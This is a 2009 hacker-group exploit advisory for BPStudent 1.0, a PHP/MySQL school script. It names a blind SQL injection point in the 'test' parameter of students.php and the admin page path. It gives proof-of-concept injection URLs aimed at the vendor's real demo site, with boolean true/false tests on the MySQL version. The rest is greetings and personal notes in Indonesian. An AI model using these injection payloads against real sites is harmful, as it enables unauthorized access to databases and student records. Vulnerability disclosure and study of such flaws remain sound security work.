BPStudent 1.0 blind SQL Injection by h3m4n

VIEWS: 25 PAGES: 3

									                                       BPStudent 1.0 blind SQL Injection                                           Page 1/3
  1    [x]==================================================================================================================
       ======================[x]
  2     |                                                      AntiSecurity[dot]org
                              |
  3    [x]==================================================================================================================
       ======================[x]
  4
  5
  6
  7    [x]==================================================================================================================
       ======================[x]
  8     | Title                : BPStudent 1.0 blind SQL Vulnerabilities
                           |
  9     | Software             : BPStudent
                           |
  10    | Vendor               : http://bpowerhouse.info
                           |
  11    | Date                 : 22 September 2009 ( Indonesia )
                           |
  12    | Author               : OoN_Boy
                           |
  13    | Contact              : oon.boy9@gmail.com
                           |
  14    | Web                  : http://oonboy.info
                           |
  15    | Blog                 : http://oonboy.blogspot.com
                           |
  16   [x]==================================================================================================================
       ======================[x]
  17
  18
  19
  20   [x]==================================================================================================================
       ======================[x]
  21    | Technology            : PHP5
                              |
  22    | Database              : MySQL
                              |
  23    | Version               : 1.0
                              |
  24    | License               : GNU GPL
                              |
  25    | Price                 : $27.90
                              |
  26    | Description           : This script is a on site school script, students can register, download study material and
        take exams− system    |
  27    |                         will mark the exams and student can graduate courses, administrator can create exams, manag
       e students and courses |
  28   [x]==================================================================================================================
       ======================[x]
  29
  30

OoN Boy                                                                                                             09/22/2009
                                       BPStudent 1.0 blind SQL Injection                                           Page 2/3
  31
  32   [x]==================================================================================================================
       ======================[x]
  33    | Google Dork          : cari sendiri yah :)
                           |
  34   [x]==================================================================================================================
       ======================[x]
  35
  36
  37
  38   [x]==================================================================================================================
       ======================[x]
  39    | Exploit              : http://localhost/[path]/students.php?page=preview&test=[sql]
                           |
  40    | Aadmin Page          : http://localhost/[path]/admin/index.php
                           |
  41   [x]==================================================================================================================
       ======================[x]
  42
  43
  44
  45   [x]==================================================================================================================
       ======================[x]
  46    | Proof of concept      : http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(
       @@version,1,1)=5 True |
  47    |                         http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(
       @@version,1,1)=4 False |
  48    |                       : Mesti login untuk mencoba exploitnya :)
                           |
  49   [x]==================================================================================================================
       ======================[x]
  50
  51
  52
  53   [x]==================================================================================================================
       ======================[x]
  54    | Greetz                : antisecurity.org batamhacker.or.id
                              |
  55    |                         Vrs−hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^−^{ martfella noname s4va
                              |
  56    |                         k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny
        rere                  |
  57   [x]==================================================================================================================
       ======================[x]
  58
  59
  60
  61   [x]==================================================================================================================
       ======================[x]
  62    | Note                 : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah
       all :)              |
  63    |                        kabur.... untuk sementara waktu.... bye bye.....
OoN Boy                                                                                                             09/22/2009
                                      BPStudent 1.0 blind SQL Injection                                           Page 3/3
                           |
  64   [x]==================================================================================================================
       ======================[x]




OoN Boy                                                                                                            09/22/2009

								
To top